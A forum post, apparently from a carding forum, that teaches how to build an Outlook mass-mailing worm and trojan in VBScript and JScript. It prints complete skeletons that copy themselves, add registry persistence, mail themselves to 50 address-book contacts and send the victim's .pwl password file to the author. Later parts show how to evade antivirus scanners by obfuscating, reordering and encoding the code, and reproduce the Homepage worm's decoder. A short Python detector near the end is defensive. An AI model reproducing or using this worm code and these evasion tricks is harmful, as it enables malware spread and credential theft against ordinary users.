VBscript - black hacking mail worm

CarderPlanet

To write the examples we will use Visual Basic Scripting Edition, the language used by the vast majority of Internet worms. Let's start with the Option Explicit and On Error Resume Next statements: the first is useful when debugging the code, since it forbids using a variable that was not declared beforehand; the second suppresses the default error handler, so execution continues past a failing statement.
Code:
Option Explicit
Dim FileSysObject, File
Set FileSysObject = CreateObject("Scripting.FileSystemObject")
Set File = FileSysObject.GetFile(WScript.ScriptFullName)

This example uses the FileSysObject and File variables; if you make a typo while writing the script, say FileSysObiect, the interpreter will report that a variable not declared with Dim is being used. Without this check such errors are very hard to find, since they often change the entire logic of the program. Now to the On Error Resume Next statement: it means that any error that occurs is left for the program code to handle later, which in our case is never. This disables the system error messages and masks the operation of the script.

Now let's describe the third and fourth lines of the example:
Code:
Set FileSysObject = CreateObject("Scripting.FileSystemObject")

This assigns the FileSysObject variable a reference to the WSH FileSystemObject COM object. Using its GetFile method, we then assign the File variable a reference to the script file itself; WScript.ScriptFullName supplies the full path of the running script.

Let's copy the script to c:\windows for later use.
Code:
File.Copy ("c:\windows\I_am_virus.vbs")

Let's assign the WshShell variable a reference to the WSH Shell COM object, which allows changing system settings and launching applications.
Code:
Dim WshShell
Set WshShell = WScript.CreateObject ("WScript.Shell")

Now we can safely control the captured computer.

First, let's write our "terrible virus" into the registry so that it restarts after a reboot, although neither this nor the copying procedure is necessary for an e-mail worm.
Code:
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows _
\CurrentVersion\RunServices\virus", "c:\windows\I_am_virus.vbs"

What comes next is limited only by your imagination: you can download a more complex virus from the Internet and run it, as I-Worm.LoveLetter did, send yourself a file with passwords, or simply and boringly corrupt a bunch of files.

And finally, we get to the "heart" of every Internet worm, the distribution procedure.

Let's create a reference to the object of the most common mail client, Outlook.
Code:
Dim OutlookObject, OutMail, Index
Set OutlookObject = CreateObject("Outlook.Application")

Let's set up a loop that sends infected messages to the first 50 addresses in the address book.
Code:
For Index = 1 To 50

Let's create a new mail message:
Code:
Set OutMail = OutlookObject.CreateItem (0)

In the "To" field, enter an address from the address book:
Code:
OutMail.to = OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index)

In the "Subject" field, insert the subject of the message:
Code:
OutMail.Subject = "Message Subject"

Add the message text:
Code:
OutMail.Body = "Message Body"

Attach the script:
Code:
OutMail.Attachments.Add (WScript.ScriptFullName)

And send it:
Code:
OutMail.Send

Next.

So you became a virus writer. Feeling uplifted? Get back down to earth: this is just a frame, and filling it is your task. Good luck!

Email worm framework:
Code:
On Error Resume Next
Dim FileSysObject, File
Set FileSysObject = CreateObject ("Scripting.FileSystemObject")
Set File = FileSysObject.GetFile(WScript.ScriptFullName)
Dim OutlookObject, OutMail, Index
Set OutlookObject = CreateObject("Outlook.Application")
For Index = 1 To 50
Set OutMail = OutlookObject.CreateItem(0)
OutMail.to =
OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index)
OutMail.Subject = "Тема сообщения"
OutMail.Body = "Тело сообщения"
OutMail.Attachments.Add(WScript.ScriptFullName)
OutMail.Send
Next

Trojan horse skeleton:
Code:
On Error Resume Next
Dim FileSysObject, File
Set FileSysObject = CreateObject ("Scripting.FileSystemObject")
Set File = FileSysObject.GetFile(WScript.ScriptFullName)
File.Copy ("c:\windows\I_am_virus.vbs")
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ _
CurrentVersion\RunServices\virus", "c:\windows\I_am_virus.vbs"
Dim OutlookObject, OutMail, Index
Set OutlookObject = CreateObject("Outlook.Application")
For Index = 1 To 50
Set OutMail = OutlookObject.CreateItem(0)
OutMail.to =
OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index)
OutMail.Subject = "Тема сообщения"
OutMail.Body = "Тело сообщения"
OutMail.Attachments.Add(WScript.ScriptFullName)
OutMail.Send
Next
Set OutMail = OutlookObject.CreateItem(0)
OutMail.to = "Ваш E-mail"
OutMail.Subject = "Тема сообщения"
OutMail.Body = "Тело сообщения"
OutMail.Attachments.Add("Путь к .pwl файлу")
OutMail.Send

Part 2. - Exploring New Opportunities
While writing the first article I ran into problems testing the scripts I wrote: the installed AVP Script Checker, on any attempt to save a file containing commands to copy a file from the local machine, send it by e-mail or read the registry, reported the presence of new modifications of various viruses. The impression was that AVP reliably guards our interests, and I decided to check whether this is really so.

While studying the documentation for Windows Scripting Host (WSH), I noticed a paragraph saying that Microsoft had created a language-independent script host that allows building analogs of .bat files in VBScript, JScript and other scripting languages, for example ActivePerl or Python. Their site said nothing about ActivePerl or Python, but JScript was described in some detail; comparing the capabilities of VBScript and JScript, it became clear that they are identical and differ only in language syntax.

Rewriting a script from one language to the other was a matter of technique; the result was:

Email worm framework
Code:
var fileSysObject, file;
fileSysObject = new ActiveXObject("Scripting.FileSystemObject");
file = fileSysObject.GetFile(WScript.ScriptFullName);
var outlookObject, outMail, index;
outlookObject = new ActiveXObject("Outlook.Application");
for (index = 1; index < 50; index++){
outMail = outlookObject.CreateItem(0);
outMail.to =
OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(index);
outMail.Subject = "Тема сообщения";
outMail.Body = "Тело сообщения";
OutMail.Attachments.Add(WScript.ScriptFullName);
outMail.Send;}

Trojan horse skeleton
Code:
var fileSysObject, file;
fileSysObject = new ActiveXObject("Scripting.FileSystemObject");
file = fileSysObject.GetFile(WScript.ScriptFullName);
file.Copy("c:\windows\I_am_virus.vbs");
var wshShell;
wshShell = new ActiveXObject("WScript.Shell");
wshShell.RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ _
CurrentVersion\RunServices\virus", "c:\windows\I_am_virus.vbs");
var outlookObject, outMail, index;
outlookObject = new ActiveXObject("Outlook.Application");
for (index = 1; index < 50; index++){
outMail = outlookObject.CreateItem(0);
outMail.to =
OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(index);
outMail.Subject = "Тема сообщения";
outMail.Body = "Тело сообщения";
OutMail.Attachments.Add(WScript.ScriptFullName);
outMail.Send;}
outMail = outlookObject.CreateItem(0);
outMail.to = "Ваш E-mail";
outMail.Subject = "Тема сообщения";
outMail.Body = "Тело сообщения";
outMail.Attachments.Add("Путь к .pwl файлу");
outMail.Send;

AVP was silent :)

However, when the script was executed, the Script Checker issued a message that this file might contain a virus and blocked its execution. After some more digging, I found out that it reacts to the attempt to send a file by mail, since the line OutMail.Attachments.Add (WScript.ScriptFullName) looks the same in VBScript and JScript. We managed to get rid of this by encoding the script with the Microsoft Windows Script Encoder.

The script was tested against the three most common anti-virus programs: Norton AntiVirus, AVP and Dr.Web. The first two remained silent, and only Dr.Web flagged it as potentially dangerous; its well-known heuristic analyzer was triggered.

Based on this analysis, we can assume that the next round of epidemics, this time with viruses written in JScript, awaits us.

Part 3. - How to trick AVP Script Checker
The method of bypassing the AVP Script Checker described above is rather complicated, since it requires knowledge of different programming languages, but many simpler methods can be devised.

Almost all anti-virus programs work on the same principle: they compare files against fragments of virus code stored in a database, the so-called signatures. The AVP Script Checker works by a similar algorithm: after a preliminary compilation it scans the file and looks for "familiar places". However, unlike the compilers of large software products, cscript.exe performs only this preliminary compilation without transforming the source code, so by slightly changing the source of a previously written virus you can easily bypass the protection.

Let's take a VBScript mail worm framework as a basis.

Let's start with the simplest method: changing the order of statements and adding spaces and blank lines.

Replace
Code:
OutMail.to = OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index)

with OutMail.to = "E-mail address", for safety, and save.

AVP "says": a new modification of the I-Worm.VBS.Fool virus has been detected.

Remove the line Set File = FileSysObject.GetFile(WScript.ScriptFullName) and it falls silent, which means the antivirus reacts precisely to the presence of this line. Swap the lines and we get:
Code:
Dim FileSysObject, File
Set FileSysObject = CreateObject ("Scripting.FileSystemObject")
Dim OutlookObject, OutMail, Index
Set OutlookObject = CreateObject("Outlook.Application")
Set File = FileSysObject.GetFile(WScript.ScriptFullName)

The AVP Script Checker does not react.

One can simply change the problem line like this:
Code:
Set File = FileSysObject. _
GetFile(WScript. _
ScriptFullName)

The effect is the same; you just need to experiment. In the I-Worm.VBS.HappyTime code, 35 blank lines were added at the beginning of the file, which was enough to prevent the antivirus from recognizing it.

There are also more sophisticated methods, such as encoding the body of the virus. A prime example is I-Worm.VBS.Homepage, in which the main code was encoded as follows:
Code:
DeCode ("Homepage encoded body")
Function DeCode (Coded)
For I = 1 To Len (Coded)
CurChar = Mid (Coded, I, 1)
If Asc (CurChar) = 15 Then
CurChar = Chr (10)
ElseIf Asc (CurChar) = 16 Then
CurChar = Chr (13)
ElseIf Asc (CurChar) = 17 Then
CurChar = Chr (32)
ElseIf Asc (CurChar) = 18 Then
CurChar = Chr (9)
Else
CurChar = Chr (Asc (CurChar) - 2)
End If
DeCode = DeCode & CurChar
Next
End Function

As a result, a rather simple script infected millions of computers around the world.
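As an added defender-side example (not code from the original post, and not AVP's actual signatures), here is a small Python checker for the traits the three parts describe: it normalizes a script the way the Part 3 tricks assume a scanner will not (joining "_" continuations, dropping blank lines and stray spaces, ignoring case and order) before matching the Outlook automation, self-attachment, RunServices persistence and Chr(Asc()) decode-loop patterns shared by the VBScript and JScript skeletons. The rule names, the two-trait threshold and the test fragment are constructed assumptions.

```python
import re

# Traits shared by the article's VBScript and JScript skeletons, matched on a
# normalized script so the Part 3 tricks (reordering, blank lines, splitting a
# statement with "_", stray spaces) do not change what the rules see.
RULES = {
    "error_suppression": r"on error resume next",
    "outlook_automation": r'(createobject|activexobject)\("outlook\.application"\)',
    "address_book_walk": r'getnamespace\("mapi"\)\.addresslists\(',
    "self_attach": r"attachments\.add\(wscript\.scriptfullname\)",
    "run_key_persistence": r'regwrite ?\(?"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\run',
    "char_shift_decoder": r"chr\(asc\(",  # the Homepage-style DeCode loop
}
PROPAGATION = {"outlook_automation", "address_book_walk", "self_attach"}

def normalize(script: str) -> str:
    """Join '_' continuations, drop blank lines, squeeze spaces, lowercase."""
    joined, pending = [], ""
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.endswith("_"):  # VBScript continuation (simplified check)
            pending += line[:-1].rstrip() + " "
            continue
        joined.append(pending + line)
        pending = ""
    text = re.sub(r"[ \t]+", " ", "\n".join(joined).lower())
    return re.sub(r" ?([.()=\\]) ?", r"\1", text)  # no spaces around . ( ) = \

def scan(script: str) -> list:
    """Names of the rules that fire on the normalized script, in RULES order."""
    text = normalize(script)
    return [name for name, pat in RULES.items() if re.search(pat, text)]

def looks_like_mail_worm(script: str) -> bool:
    """Two propagation traits, so a script that merely opens Outlook passes."""
    return len(PROPAGATION & set(scan(script))) >= 2

# Constructed fragment (not the article's full skeleton): the Part 3
# line-splitting trick plus blank lines and odd spacing around the calls.
VBS_FRAGMENT = """

On  Error Resume Next
Set File = FileSysObject. _
    GetFile(WScript. _
    ScriptFullName)
Set OutlookObject = CreateObject ( "Outlook.Application" )
OutMail.Attachments.Add ( WScript.ScriptFullName )
"""
```

Encoded bodies (the Homepage decoder's output or Script Encoder output) still hide these calls from text rules; only the decode loop itself stays visible, which is why it gets its own rule.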

The next step is polymorphism in VBS: a script that can modify its own code as needed.

To the displeasure of "real virus writers", who consider scripting technologies fun for lamers, the number of viruses using this technology is steadily growing. This is due to the ease of implementation and integration into the operating system: with scripts you can completely control the system, start and stop processes, remotely create and delete users, edit files, and much more...

Links
Windows Script Encoder is here:

P.S. Creation, use and distribution of malicious programs for computers is punishable by law.